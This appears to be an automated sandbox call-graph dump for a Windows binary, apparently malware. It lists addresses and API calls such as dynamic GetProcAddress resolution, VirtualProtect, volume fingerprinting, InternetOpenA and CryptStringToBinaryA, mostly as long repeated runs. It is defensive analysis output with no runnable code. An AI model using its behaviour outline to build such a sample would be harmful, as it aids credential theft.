lstrcpy 13496->13497 13498 1005ed6 13497->13498 15065 ff4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13498->15065 13500 1005edb 13501 ff1590 lstrcpy 13500->13501 13502 1005f5b 13501->13502 15072 1000740 13502->15072 13504 1005f60 13505 100a740 lstrcpy 13504->13505 13506 1005f86 13505->13506 13507 ff1590 lstrcpy 13506->13507 13508 1005f9a 13507->13508 13509 ff5960 34 API calls 13508->13509 13510 1005fa0 13509->13510 13604 ff45d1 RtlAllocateHeap 13603->13604 13607 ff4621 VirtualProtect 13604->13607 13607->13252 13608->13339 13610 ff10c2 ctype 13609->13610 13611 ff10fd 13610->13611 13612 ff10e2 VirtualFree 13610->13612 13611->13369 13612->13611 13614 ff1233 GlobalMemoryStatusEx 13613->13614 13614->13372 13615->13396 13617 100a7c2 13616->13617 13618 100a7ec 13617->13618 13619 100a7da lstrcpy 13617->13619 13618->13401 13619->13618 13621 100a740 lstrcpy 13620->13621 13622 1006833 13621->13622 13623 100a9b0 4 API calls 13622->13623 13624 1006845 13623->13624 13625 100a8a0 lstrcpy 13624->13625 13626 100684e 13625->13626 13627 100a9b0 4 API calls 13626->13627 13628 1006867 13627->13628 13629 100a8a0 lstrcpy 13628->13629 13630 1006870 13629->13630 13631 100a9b0 4 API calls 13630->13631 13632 100688a 13631->13632 13633 100a8a0 lstrcpy 13632->13633 13634 1006893 13633->13634 13635 100a9b0 4 API calls 13634->13635 13636 10068ac 13635->13636 13637 100a8a0 lstrcpy 13636->13637 13638 10068b5 13637->13638 13639 100a9b0 4 API calls 13638->13639 13640 10068cf 13639->13640 13641 100a8a0 lstrcpy 13640->13641 13642 10068d8 13641->13642 13643 100a9b0 4 API calls 13642->13643 13644 10068f3 13643->13644 13645 100a8a0 lstrcpy 13644->13645 13646 10068fc 13645->13646 13647 100a7a0 lstrcpy 13646->13647 13648 1006910 13647->13648 13648->13408 13650 100a812 13649->13650 13650->13411 13652 100a83f 13651->13652 13653 1005b54 13652->13653 13654 100a87b lstrcpy 13652->13654 13653->13421 13654->13653 13656 100a8a0 lstrcpy 13655->13656 13657 1006443 13656->13657 13658 100a8a0 lstrcpy 13657->13658 13659 1006455 13658->13659 13660 100a8a0 lstrcpy 13659->13660 13661 1006467 13660->13661 13662 100a8a0 lstrcpy 13661->13662 13663 1005b86 13662->13663 13663->13427 13665 ff45c0 2 API calls 13664->13665 13666 ff26b4 13665->13666 13667 ff45c0 2 API calls 13666->13667 13668 ff26d7 13667->13668 13669 ff45c0 2 API calls 13668->13669 13670 ff26f0 13669->13670 13671 ff45c0 2 API calls 13670->13671 13672 ff2709 13671->13672 13673 ff45c0 2 API calls 13672->13673 13674 ff2736 13673->13674 13675 ff45c0 2 API calls 13674->13675 13676 ff274f 13675->13676 13677 ff45c0 2 API calls 13676->13677 13678 ff2768 13677->13678 13679 ff45c0 2 API calls 13678->13679 13680 ff2795 13679->13680 13681 ff45c0 2 API calls 13680->13681 13682 ff27ae 13681->13682 13683 ff45c0 2 API calls 13682->13683 13684 ff27c7 13683->13684 13685 ff45c0 2 API calls 13684->13685 13686 ff27e0 13685->13686 13687 ff45c0 2 API calls 13686->13687 13688 ff27f9 13687->13688 13689 ff45c0 2 API calls 13688->13689 13690 ff2812 13689->13690 13691 ff45c0 2 API calls 13690->13691 13692 ff282b 13691->13692 13693 ff45c0 2 API calls 13692->13693 13694 ff2844 13693->13694 13695 ff45c0 2 API calls 13694->13695 13696 ff285d 13695->13696 13697 ff45c0 2 API calls 13696->13697 13698 ff2876 13697->13698 13699 ff45c0 2 API calls 13698->13699 13700 ff288f 13699->13700 13701 ff45c0 2 API calls 13700->13701 13702 ff28a8 13701->13702 13703 ff45c0 2 API calls 13702->13703 13704 ff28c1 13703->13704 13705 ff45c0 2 API calls 13704->13705 13706 ff28da 13705->13706 13707 ff45c0 2 API calls 13706->13707 13708 ff28f3 13707->13708 13709 ff45c0 2 API calls 13708->13709 13710 ff290c 13709->13710 13711 ff45c0 2 API calls 13710->13711 13712 ff2925 13711->13712 13713 ff45c0 2 API calls 13712->13713 13714 ff293e 13713->13714 13715 ff45c0 2 API calls 13714->13715 13716 ff2957 13715->13716 13717 ff45c0 2 API calls 13716->13717 13718 ff2970 13717->13718 13719 ff45c0 2 API calls 13718->13719 13720 ff2989 13719->13720 13721 ff45c0 2 API calls 13720->13721 13722 ff29a2 13721->13722 13723 ff45c0 2 API calls 13722->13723 13724 ff29bb 13723->13724 13725 ff45c0 2 API calls 13724->13725 13726 ff29d4 13725->13726 13727 ff45c0 2 API calls 13726->13727 13728 ff29ed 13727->13728 13729 ff45c0 2 API calls 13728->13729 13730 ff2a06 13729->13730 13731 ff45c0 2 API calls 13730->13731 13732 ff2a1f 13731->13732 13733 ff45c0 2 API calls 13732->13733 13734 ff2a38 13733->13734 13735 ff45c0 2 API calls 13734->13735 13736 ff2a51 13735->13736 13737 ff45c0 2 API calls 13736->13737 13738 ff2a6a 13737->13738 13739 ff45c0 2 API calls 13738->13739 13740 ff2a83 13739->13740 13741 ff45c0 2 API calls 13740->13741 13742 ff2a9c 13741->13742 13743 ff45c0 2 API calls 13742->13743 13744 ff2ab5 13743->13744 13745 ff45c0 2 API calls 13744->13745 13746 ff2ace 13745->13746 13747 ff45c0 2 API calls 13746->13747 13748 ff2ae7 13747->13748 13749 ff45c0 2 API calls 13748->13749 13750 ff2b00 13749->13750 13751 ff45c0 2 API calls 13750->13751 13752 ff2b19 13751->13752 13753 ff45c0 2 API calls 13752->13753 13754 ff2b32 13753->13754 13755 ff45c0 2 API calls 13754->13755 13756 ff2b4b 13755->13756 13757 ff45c0 2 API calls 13756->13757 13758 ff2b64 13757->13758 13759 ff45c0 2 API calls 13758->13759 13760 ff2b7d 13759->13760 13761 ff45c0 2 API calls 13760->13761 13762 ff2b96 13761->13762 13763 ff45c0 2 API calls 13762->13763 13764 ff2baf 13763->13764 13765 ff45c0 2 API calls 13764->13765 13766 ff2bc8 13765->13766 13767 ff45c0 2 API calls 13766->13767 13768 ff2be1 13767->13768 13769 ff45c0 2 API calls 13768->13769 13770 ff2bfa 13769->13770 13771 ff45c0 2 API calls 13770->13771 13772 ff2c13 13771->13772 13773 ff45c0 2 API calls 13772->13773 13774 ff2c2c 13773->13774 13775 ff45c0 2 API calls 13774->13775 13776 ff2c45 13775->13776 13777 ff45c0 2 API calls 13776->13777 13778 ff2c5e 13777->13778 13779 ff45c0 2 API calls 13778->13779 13780 ff2c77 13779->13780 13781 ff45c0 2 API calls 13780->13781 13782 ff2c90 13781->13782 13783 ff45c0 2 API calls 13782->13783 13784 ff2ca9 13783->13784 13785 ff45c0 2 API calls 13784->13785 13786 ff2cc2 13785->13786 13787 ff45c0 2 API calls 13786->13787 13788 ff2cdb 13787->13788 13789 ff45c0 2 API calls 13788->13789 13790 ff2cf4 13789->13790 13791 ff45c0 2 API calls 13790->13791 13792 ff2d0d 13791->13792 13793 ff45c0 2 API calls 13792->13793 13794 ff2d26 13793->13794 13795 ff45c0 2 API calls 13794->13795 13796 ff2d3f 13795->13796 13797 ff45c0 2 API calls 13796->13797 13798 ff2d58 13797->13798 13799 ff45c0 2 API calls 13798->13799 13800 ff2d71 13799->13800 13801 ff45c0 2 API calls 13800->13801 13802 ff2d8a 13801->13802 13803 ff45c0 2 API calls 13802->13803 13804 ff2da3 13803->13804 13805 ff45c0 2 API calls 13804->13805 13806 ff2dbc 13805->13806 13807 ff45c0 2 API calls 13806->13807 13808 ff2dd5 13807->13808 13809 ff45c0 2 API calls 13808->13809 13810 ff2dee 13809->13810 13811 ff45c0 2 API calls 13810->13811 13812 ff2e07 13811->13812 13813 ff45c0 2 API calls 13812->13813 13814 ff2e20 13813->13814 13815 ff45c0 2 API calls 13814->13815 13816 ff2e39 13815->13816 13817 ff45c0 2 API calls 13816->13817 13818 ff2e52 13817->13818 13819 ff45c0 2 API calls 13818->13819 13820 ff2e6b 13819->13820 13821 ff45c0 2 API calls 13820->13821 13822 ff2e84 13821->13822 13823 ff45c0 2 API calls 13822->13823 13824 ff2e9d 13823->13824 13825 ff45c0 2 API calls 13824->13825 13826 ff2eb6 13825->13826 13827 ff45c0 2 API calls 13826->13827 13828 ff2ecf 13827->13828 13829 ff45c0 2 API calls 13828->13829 13830 ff2ee8 13829->13830 13831 ff45c0 2 API calls 13830->13831 13832 ff2f01 13831->13832 13833 ff45c0 2 API calls 13832->13833 13834 ff2f1a 13833->13834 13835 ff45c0 2 API calls 13834->13835 13836 ff2f33 13835->13836 13837 ff45c0 2 API calls 13836->13837 13838 ff2f4c 13837->13838 13839 ff45c0 2 API calls 13838->13839 13840 ff2f65 13839->13840 13841 ff45c0 2 API calls 13840->13841 13842 ff2f7e 13841->13842 13843 ff45c0 2 API calls 13842->13843 13844 ff2f97 13843->13844 13845 ff45c0 2 API calls 13844->13845 13846 ff2fb0 13845->13846 13847 ff45c0 2 API calls 13846->13847 13848 ff2fc9 13847->13848 13849 ff45c0 2 API calls 13848->13849 13850 ff2fe2 13849->13850 13851 ff45c0 2 API calls 13850->13851 13852 ff2ffb 13851->13852 13853 ff45c0 2 API calls 13852->13853 13854 ff3014 13853->13854 13855 ff45c0 2 API calls 13854->13855 13856 ff302d 13855->13856 13857 ff45c0 2 API calls 13856->13857 13858 ff3046 13857->13858 13859 ff45c0 2 API calls 13858->13859 13860 ff305f 13859->13860 13861 ff45c0 2 API calls 13860->13861 13862 ff3078 13861->13862 13863 ff45c0 2 API calls 13862->13863 13864 ff3091 13863->13864 13865 ff45c0 2 API calls 13864->13865 13866 ff30aa 13865->13866 13867 ff45c0 2 API calls 13866->13867 13868 ff30c3 13867->13868 13869 ff45c0 2 API calls 13868->13869 13870 ff30dc 13869->13870 13871 ff45c0 2 API calls 13870->13871 13872 ff30f5 13871->13872 13873 ff45c0 2 API calls 13872->13873 13874 ff310e 13873->13874 13875 ff45c0 2 API calls 13874->13875 13876 ff3127 13875->13876 13877 ff45c0 2 API calls 13876->13877 13878 ff3140 13877->13878 13879 ff45c0 2 API calls 13878->13879 13880 ff3159 13879->13880 13881 ff45c0 2 API calls 13880->13881 13882 ff3172 13881->13882 13883 ff45c0 2 API calls 13882->13883 13884 ff318b 13883->13884 13885 ff45c0 2 API calls 13884->13885 13886 ff31a4 13885->13886 13887 ff45c0 2 API calls 13886->13887 13888 ff31bd 13887->13888 13889 ff45c0 2 API calls 13888->13889 13890 ff31d6 13889->13890 13891 ff45c0 2 API calls 13890->13891 13892 ff31ef 13891->13892 13893 ff45c0 2 API calls 13892->13893 13894 ff3208 13893->13894 13895 ff45c0 2 API calls 13894->13895 13896 ff3221 13895->13896 13897 ff45c0 2 API calls 13896->13897 13898 ff323a 13897->13898 13899 ff45c0 2 API calls 13898->13899 13900 ff3253 13899->13900 13901 ff45c0 2 API calls 13900->13901 13902 ff326c 13901->13902 13903 ff45c0 2 API calls 13902->13903 13904 ff3285 13903->13904 13905 ff45c0 2 API calls 13904->13905 13906 ff329e 13905->13906 13907 ff45c0 2 API calls 13906->13907 13908 ff32b7 13907->13908 13909 ff45c0 2 API calls 13908->13909 13910 ff32d0 13909->13910 13911 ff45c0 2 API calls 13910->13911 13912 ff32e9 13911->13912 13913 ff45c0 2 API calls 13912->13913 13914 ff3302 13913->13914 13915 ff45c0 2 API calls 13914->13915 13916 ff331b 13915->13916 13917 ff45c0 2 API calls 13916->13917 13918 ff3334 13917->13918 13919 ff45c0 2 API calls 13918->13919 13920 ff334d 13919->13920 13921 ff45c0 2 API calls 13920->13921 13922 ff3366 13921->13922 13923 ff45c0 2 API calls 13922->13923 13924 ff337f 13923->13924 13925 ff45c0 2 API calls 13924->13925 13926 ff3398 13925->13926 13927 ff45c0 2 API calls 13926->13927 13928 ff33b1 13927->13928 13929 ff45c0 2 API calls 13928->13929 13930 ff33ca 13929->13930 13931 ff45c0 2 API calls 13930->13931 13932 ff33e3 13931->13932 13933 ff45c0 2 API calls 13932->13933 13934 ff33fc 13933->13934 13935 ff45c0 2 API calls 13934->13935 13936 ff3415 13935->13936 13937 ff45c0 2 API calls 13936->13937 13938 ff342e 13937->13938 13939 ff45c0 2 API calls 13938->13939 13940 ff3447 13939->13940 13941 ff45c0 2 API calls 13940->13941 13942 ff3460 13941->13942 13943 ff45c0 2 API calls 13942->13943 13944 ff3479 13943->13944 13945 ff45c0 2 API calls 13944->13945 13946 ff3492 13945->13946 13947 ff45c0 2 API calls 13946->13947 13948 ff34ab 13947->13948 13949 ff45c0 2 API calls 13948->13949 13950 ff34c4 13949->13950 13951 ff45c0 2 API calls 13950->13951 13952 ff34dd 13951->13952 13953 ff45c0 2 API calls 13952->13953 13954 ff34f6 13953->13954 13955 ff45c0 2 API calls 13954->13955 13956 ff350f 13955->13956 13957 ff45c0 2 API calls 13956->13957 13958 ff3528 13957->13958 13959 ff45c0 2 API calls 13958->13959 13960 ff3541 13959->13960 13961 ff45c0 2 API calls 13960->13961 13962 ff355a 13961->13962 13963 ff45c0 2 API calls 13962->13963 13964 ff3573 13963->13964 13965 ff45c0 2 API calls 13964->13965 13966 ff358c 13965->13966 13967 ff45c0 2 API calls 13966->13967 13968 ff35a5 13967->13968 13969 ff45c0 2 API calls 13968->13969 13970 ff35be 13969->13970 13971 ff45c0 2 API calls 13970->13971 13972 ff35d7 13971->13972 13973 ff45c0 2 API calls 13972->13973 13974 ff35f0 13973->13974 13975 ff45c0 2 API calls 13974->13975 13976 ff3609 13975->13976 13977 ff45c0 2 API calls 13976->13977 13978 ff3622 13977->13978 13979 ff45c0 2 API calls 13978->13979 13980 ff363b 13979->13980 13981 ff45c0 2 API calls 13980->13981 13982 ff3654 13981->13982 13983 ff45c0 2 API calls 13982->13983 13984 ff366d 13983->13984 13985 ff45c0 2 API calls 13984->13985 13986 ff3686 13985->13986 13987 ff45c0 2 API calls 13986->13987 13988 ff369f 13987->13988 13989 ff45c0 2 API calls 13988->13989 13990 ff36b8 13989->13990 13991 ff45c0 2 API calls 13990->13991 13992 ff36d1 13991->13992 13993 ff45c0 2 API calls 13992->13993 13994 ff36ea 13993->13994 13995 ff45c0 2 API calls 13994->13995 13996 ff3703 13995->13996 13997 ff45c0 2 API calls 13996->13997 13998 ff371c 13997->13998 13999 ff45c0 2 API calls 13998->13999 14000 ff3735 13999->14000 14001 ff45c0 2 API calls 14000->14001 14002 ff374e 14001->14002 14003 ff45c0 2 API calls 14002->14003 14004 ff3767 14003->14004 14005 ff45c0 2 API calls 14004->14005 14006 ff3780 14005->14006 14007 ff45c0 2 API calls 14006->14007 14008 ff3799 14007->14008 14009 ff45c0 2 API calls 14008->14009 14010 ff37b2 14009->14010 14011 ff45c0 2 API calls 14010->14011 14012 ff37cb 14011->14012 14013 ff45c0 2 API calls 14012->14013 14014 ff37e4 14013->14014 14015 ff45c0 2 API calls 14014->14015 14016 ff37fd 14015->14016 14017 ff45c0 2 API calls 14016->14017 14018 ff3816 14017->14018 14019 ff45c0 2 API calls 14018->14019 14020 ff382f 14019->14020 14021 ff45c0 2 API calls 14020->14021 14022 ff3848 14021->14022 14023 ff45c0 2 API calls 14022->14023 14024 ff3861 14023->14024 14025 ff45c0 2 API calls 14024->14025 14026 ff387a 14025->14026 14027 ff45c0 2 API calls 14026->14027 14028 ff3893 14027->14028 14029 ff45c0 2 API calls 14028->14029 14030 ff38ac 14029->14030 14031 ff45c0 2 API calls 14030->14031 14032 ff38c5 14031->14032 14033 ff45c0 2 API calls 14032->14033 14034 ff38de 14033->14034 14035 ff45c0 2 API calls 14034->14035 14036 ff38f7 14035->14036 14037 ff45c0 2 API calls 14036->14037 14038 ff3910 14037->14038 14039 ff45c0 2 API calls 14038->14039 14040 ff3929 14039->14040 14041 ff45c0 2 API calls 14040->14041 14042 ff3942 14041->14042 14043 ff45c0 2 API calls 14042->14043 14044 ff395b 14043->14044 14045 ff45c0 2 API calls 14044->14045 14046 ff3974 14045->14046 14047 ff45c0 2 API calls 14046->14047 14048 ff398d 14047->14048 14049 ff45c0 2 API calls 14048->14049 14050 ff39a6 14049->14050 14051 ff45c0 2 API calls 14050->14051 14052 ff39bf 14051->14052 14053 ff45c0 2 API calls 14052->14053 14054 ff39d8 14053->14054 14055 ff45c0 2 API calls 14054->14055 14056 ff39f1 14055->14056 14057 ff45c0 2 API calls 14056->14057 14058 ff3a0a 14057->14058 14059 ff45c0 2 API calls 14058->14059 14060 ff3a23 14059->14060 14061 ff45c0 2 API calls 14060->14061 14062 ff3a3c 14061->14062 14063 ff45c0 2 API calls 14062->14063 14064 ff3a55 14063->14064 14065 ff45c0 2 API calls 14064->14065 14066 ff3a6e 14065->14066 14067 ff45c0 2 API calls 14066->14067 14068 ff3a87 14067->14068 14069 ff45c0 2 API calls 14068->14069 14070 ff3aa0 14069->14070 14071 ff45c0 2 API calls 14070->14071 14072 ff3ab9 14071->14072 14073 ff45c0 2 API calls 14072->14073 14074 ff3ad2 14073->14074 14075 ff45c0 2 API calls 14074->14075 14076 ff3aeb 14075->14076 14077 ff45c0 2 API calls 14076->14077 14078 ff3b04 14077->14078 14079 ff45c0 2 API calls 14078->14079 14080 ff3b1d 14079->14080 14081 ff45c0 2 API calls 14080->14081 14082 ff3b36 14081->14082 14083 ff45c0 2 API calls 14082->14083 14084 ff3b4f 14083->14084 14085 ff45c0 2 API calls 14084->14085 14086 ff3b68 14085->14086 14087 ff45c0 2 API calls 14086->14087 14088 ff3b81 14087->14088 14089 ff45c0 2 API calls 14088->14089 14090 ff3b9a 14089->14090 14091 ff45c0 2 API calls 14090->14091 14092 ff3bb3 14091->14092 14093 ff45c0 2 API calls 14092->14093 14094 ff3bcc 14093->14094 14095 ff45c0 2 API calls 14094->14095 14096 ff3be5 14095->14096 14097 ff45c0 2 API calls 14096->14097 14098 ff3bfe 14097->14098 14099 ff45c0 2 API calls 14098->14099 14100 ff3c17 14099->14100 14101 ff45c0 2 API calls 14100->14101 14102 ff3c30 14101->14102 14103 ff45c0 2 API calls 14102->14103 14104 ff3c49 14103->14104 14105 ff45c0 2 API calls 14104->14105 14106 ff3c62 14105->14106 14107 ff45c0 2 API calls 14106->14107 14108 ff3c7b 14107->14108 14109 ff45c0 2 API calls 14108->14109 14110 ff3c94 14109->14110 14111 ff45c0 2 API calls 14110->14111 14112 ff3cad 14111->14112 14113 ff45c0 2 API calls 14112->14113 14114 ff3cc6 14113->14114 14115 ff45c0 2 API calls 14114->14115 14116 ff3cdf 14115->14116 14117 ff45c0 2 API calls 14116->14117 14118 ff3cf8 14117->14118 14119 ff45c0 2 API calls 14118->14119 14120 ff3d11 14119->14120 14121 ff45c0 2 API calls 14120->14121 14122 ff3d2a 14121->14122 14123 ff45c0 2 API calls 14122->14123 14124 ff3d43 14123->14124 14125 ff45c0 2 API calls 14124->14125 14126 ff3d5c 14125->14126 14127 ff45c0 2 API calls 14126->14127 14128 ff3d75 14127->14128 14129 ff45c0 2 API calls 14128->14129 14130 ff3d8e 14129->14130 14131 ff45c0 2 API calls 14130->14131 14132 ff3da7 14131->14132 14133 ff45c0 2 API calls 14132->14133 14134 ff3dc0 14133->14134 14135 ff45c0 2 API calls 14134->14135 14136 ff3dd9 14135->14136 14137 ff45c0 2 API calls 14136->14137 14138 ff3df2 14137->14138 14139 ff45c0 2 API calls 14138->14139 14140 ff3e0b 14139->14140 14141 ff45c0 2 API calls 14140->14141 14142 ff3e24 14141->14142 14143 ff45c0 2 API calls 14142->14143 14144 ff3e3d 14143->14144 14145 ff45c0 2 API calls 14144->14145 14146 ff3e56 14145->14146 14147 ff45c0 2 API calls 14146->14147 14148 ff3e6f 14147->14148 14149 ff45c0 2 API calls 14148->14149 14150 ff3e88 14149->14150 14151 ff45c0 2 API calls 14150->14151 14152 ff3ea1 14151->14152 14153 ff45c0 2 API calls 14152->14153 14154 ff3eba 14153->14154 14155 ff45c0 2 API calls 14154->14155 14156 ff3ed3 14155->14156 14157 ff45c0 2 API calls 14156->14157 14158 ff3eec 14157->14158 14159 ff45c0 2 API calls 14158->14159 14160 ff3f05 14159->14160 14161 ff45c0 2 API calls 14160->14161 14162 ff3f1e 14161->14162 14163 ff45c0 2 API calls 14162->14163 14164 ff3f37 14163->14164 14165 ff45c0 2 API calls 14164->14165 14166 ff3f50 14165->14166 14167 ff45c0 2 API calls 14166->14167 14168 ff3f69 14167->14168 14169 ff45c0 2 API calls 14168->14169 14170 ff3f82 14169->14170 14171 ff45c0 2 API calls 14170->14171 14172 ff3f9b 14171->14172 14173 ff45c0 2 API calls 14172->14173 14174 ff3fb4 14173->14174 14175 ff45c0 2 API calls 14174->14175 14176 ff3fcd 14175->14176 14177 ff45c0 2 API calls 14176->14177 14178 ff3fe6 14177->14178 14179 ff45c0 2 API calls 14178->14179 14180 ff3fff 14179->14180 14181 ff45c0 2 API calls 14180->14181 14182 ff4018 14181->14182 14183 ff45c0 2 API calls 14182->14183 14184 ff4031 14183->14184 14185 ff45c0 2 API calls 14184->14185 14186 ff404a 14185->14186 14187 ff45c0 2 API calls 14186->14187 14188 ff4063 14187->14188 14189 ff45c0 2 API calls 14188->14189 14190 ff407c 14189->14190 14191 ff45c0 2 API calls 14190->14191 14192 ff4095 14191->14192 14193 ff45c0 2 API calls 14192->14193 14194 ff40ae 14193->14194 14195 ff45c0 2 API calls 14194->14195 14196 ff40c7 14195->14196 14197 ff45c0 2 API calls 14196->14197 14198 ff40e0 14197->14198 14199 ff45c0 2 API calls 14198->14199 14200 ff40f9 14199->14200 14201 ff45c0 2 API calls 14200->14201 14202 ff4112 14201->14202 14203 ff45c0 2 API calls 14202->14203 14204 ff412b 14203->14204 14205 ff45c0 2 API calls 14204->14205 14206 ff4144 14205->14206 14207 ff45c0 2 API calls 14206->14207 14208 ff415d 14207->14208 14209 ff45c0 2 API calls 14208->14209 14210 ff4176 14209->14210 14211 ff45c0 2 API calls 14210->14211 14212 ff418f 14211->14212 14213 ff45c0 2 API calls 14212->14213 14214 ff41a8 14213->14214 14215 ff45c0 2 API calls 14214->14215 14216 ff41c1 14215->14216 14217 ff45c0 2 API calls 14216->14217 14218 ff41da 14217->14218 14219 ff45c0 2 API calls 14218->14219 14220 ff41f3 14219->14220 14221 ff45c0 2 API calls 14220->14221 14222 ff420c 14221->14222 14223 ff45c0 2 API calls 14222->14223 14224 ff4225 14223->14224 14225 ff45c0 2 API calls 14224->14225 14226 ff423e 14225->14226 14227 ff45c0 2 API calls 14226->14227 14228 ff4257 14227->14228 14229 ff45c0 2 API calls 14228->14229 14230 ff4270 14229->14230 14231 ff45c0 2 API calls 14230->14231 14232 ff4289 14231->14232 14233 ff45c0 2 API calls 14232->14233 14234 ff42a2 14233->14234 14235 ff45c0 2 API calls 14234->14235 14236 ff42bb 14235->14236 14237 ff45c0 2 API calls 14236->14237 14238 ff42d4 14237->14238 14239 ff45c0 2 API calls 14238->14239 14240 ff42ed 14239->14240 14241 ff45c0 2 API calls 14240->14241 14242 ff4306 14241->14242 14243 ff45c0 2 API calls 14242->14243 14244 ff431f 14243->14244 14245 ff45c0 2 API calls 14244->14245 14246 ff4338 14245->14246 14247 ff45c0 2 API calls 14246->14247 14248 ff4351 14247->14248 14249 ff45c0 2 API calls 14248->14249 14250 ff436a 14249->14250 14251 ff45c0 2 API calls 14250->14251 14252 ff4383 14251->14252 14253 ff45c0 2 API calls 14252->14253 14254 ff439c 14253->14254 14255 ff45c0 2 API calls 14254->14255 14256 ff43b5 14255->14256 14257 ff45c0 2 API calls 14256->14257 14258 ff43ce 14257->14258 14259 ff45c0 2 API calls 14258->14259 14260 ff43e7 14259->14260 14261 ff45c0 2 API calls 14260->14261 14262 ff4400 14261->14262 14263 ff45c0 2 API calls 14262->14263 14264 ff4419 14263->14264 14265 ff45c0 2 API calls 14264->14265 14266 ff4432 14265->14266 14267 ff45c0 2 API calls 14266->14267 14268 ff444b 14267->14268 14269 ff45c0 2 API calls 14268->14269 14270 ff4464 14269->14270 14271 ff45c0 2 API calls 14270->14271 14272 ff447d 14271->14272 14273 ff45c0 2 API calls 14272->14273 14274 ff4496 14273->14274 14275 ff45c0 2 API calls 14274->14275 14276 ff44af 14275->14276 14277 ff45c0 2 API calls 14276->14277 14278 ff44c8 14277->14278 14279 ff45c0 2 API calls 14278->14279 14280 ff44e1 14279->14280 14281 ff45c0 2 API calls 14280->14281 14282 ff44fa 14281->14282 14283 ff45c0 2 API calls 14282->14283 14284 ff4513 14283->14284 14285 ff45c0 2 API calls 14284->14285 14286 ff452c 14285->14286 14287 ff45c0 2 API calls 14286->14287 14288 ff4545 14287->14288 14289 ff45c0 2 API calls 14288->14289 14290 ff455e 14289->14290 14291 ff45c0 2 API calls 14290->14291 14292 ff4577 14291->14292 14293 ff45c0 2 API calls 14292->14293 14294 ff4590 14293->14294 14295 ff45c0 2 API calls 14294->14295 14296 ff45a9 14295->14296 14297 1009c10 14296->14297 14298 1009c20 43 API calls 14297->14298 14299 100a036 8 API calls 14297->14299 14298->14299 14300 100a146 14299->14300 14301 100a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14299->14301 14302 100a153 8 API calls 14300->14302 14303 100a216 14300->14303 14301->14300 14302->14303 14304 100a298 14303->14304 14305 100a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14303->14305 14306 100a2a5 6 API calls 14304->14306 14307 100a337 14304->14307 14305->14304 14306->14307 14308 100a344 9 API calls 14307->14308 14309 100a41f 14307->14309 14308->14309 14310 100a4a2 14309->14310 14311 100a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14309->14311 14312 100a4ab GetProcAddress GetProcAddress 14310->14312 14313 100a4dc 14310->14313 14311->14310 14312->14313 14314 100a515 14313->14314 14315 100a4e5 GetProcAddress GetProcAddress 14313->14315 14316 100a612 14314->14316 14317 100a522 10 API calls 14314->14317 14315->14314 14318 100a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14316->14318 14319 100a67d 14316->14319 14317->14316 14318->14319 14320 100a686 GetProcAddress 14319->14320 14321 100a69e 14319->14321 14320->14321 14322 100a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14321->14322 14323 1005ca3 14321->14323 14322->14323 14324 ff1590 14323->14324 15445 ff1670 14324->15445 14327 100a7a0 lstrcpy 14328 ff15b5 14327->14328 14329 100a7a0 lstrcpy 14328->14329 14330 ff15c7 14329->14330 14331 100a7a0 lstrcpy 14330->14331 14332 ff15d9 14331->14332 14333 100a7a0 lstrcpy 14332->14333 14334 ff1663 14333->14334 14335 1005510 14334->14335 14336 1005521 14335->14336 14337 100a820 2 API calls 14336->14337 14338 100552e 14337->14338 14339 100a820 2 API calls 14338->14339 14340 100553b 14339->14340 14341 100a820 2 API calls 14340->14341 14342 1005548 14341->14342 14343 100a740 lstrcpy 14342->14343 14344 1005555 14343->14344 14345 100a740 lstrcpy 14344->14345 14346 1005562 14345->14346 14347 100a740 lstrcpy 14346->14347 14348 100556f 14347->14348 14349 100a740 lstrcpy 14348->14349 14389 100557c 14349->14389 14350 100a7a0 lstrcpy 14350->14389 14351 100a740 lstrcpy 14351->14389 14352 1005643 StrCmpCA 14352->14389 14353 10056a0 StrCmpCA 14354 10057dc 14353->14354 14353->14389 14355 100a8a0 lstrcpy 14354->14355 14356 10057e8 14355->14356 14357 100a820 2 API calls 14356->14357 14359 10057f6 14357->14359 14358 100a820 lstrlen lstrcpy 14358->14389 14362 100a820 2 API calls 14359->14362 14360 1005856 StrCmpCA 14363 1005991 14360->14363 14360->14389 14361 10051f0 20 API calls 14361->14389 14365 1005805 14362->14365 14364 100a8a0 lstrcpy 14363->14364 14366 100599d 14364->14366 14367 ff1670 lstrcpy 14365->14367 14369 100a820 2 API calls 14366->14369 14388 1005811 14367->14388 14368 ff1590 lstrcpy 14368->14389 14370 10059ab 14369->14370 14373 100a820 2 API calls 14370->14373 14371 1005a0b StrCmpCA 14374 1005a16 Sleep 14371->14374 14375 1005a28 14371->14375 14372 10052c0 25 API calls 14372->14389 14376 10059ba 14373->14376 14374->14389 14377 100a8a0 lstrcpy 14375->14377 14378 ff1670 lstrcpy 14376->14378 14379 1005a34 14377->14379 14378->14388 14380 100a820 2 API calls 14379->14380 14381 1005a43 14380->14381 14382 100a820 2 API calls 14381->14382 14383 1005a52 14382->14383 14386 ff1670 lstrcpy 14383->14386 14384 100a8a0 lstrcpy 14384->14389 14385 100578a StrCmpCA 14385->14389 14386->14388 14387 100593f StrCmpCA 14387->14389 14388->13442 14389->14350 14389->14351 14389->14352 14389->14353 14389->14358 14389->14360 14389->14361 14389->14368 14389->14371 14389->14372 14389->14384 14389->14385 14389->14387 14391 1007553 GetVolumeInformationA 14390->14391 14392 100754c 14390->14392 14393 1007591 14391->14393 14392->14391 14394 10075fc GetProcessHeap RtlAllocateHeap 14393->14394 14395 1007628 wsprintfA 14394->14395 14396 1007619 14394->14396 14398 100a740 lstrcpy 14395->14398 14397 100a740 lstrcpy 14396->14397 14399 1005da7 14397->14399 14398->14399 14399->13463 14401 100a7a0 lstrcpy 14400->14401 14402 ff4899 14401->14402 15454 ff47b0 14402->15454 14404 ff48a5 14405 100a740 lstrcpy 14404->14405 14406 ff48d7 14405->14406 14407 100a740 lstrcpy 14406->14407 14408 ff48e4 14407->14408 14409 100a740 lstrcpy 14408->14409 14410 ff48f1 14409->14410 14411 100a740 lstrcpy 14410->14411 14412 ff48fe 14411->14412 14413 100a740 lstrcpy 14412->14413 14414 ff490b InternetOpenA StrCmpCA 14413->14414 14415 ff4944 14414->14415 14416 ff4ecb InternetCloseHandle 14415->14416 15460 1008b60 14415->15460 14418 ff4ee8 14416->14418 15475 ff9ac0 CryptStringToBinaryA 14418->15475 14419 ff4963 15468 100a920 14419->15468 14422 ff4976 14424 100a8a0 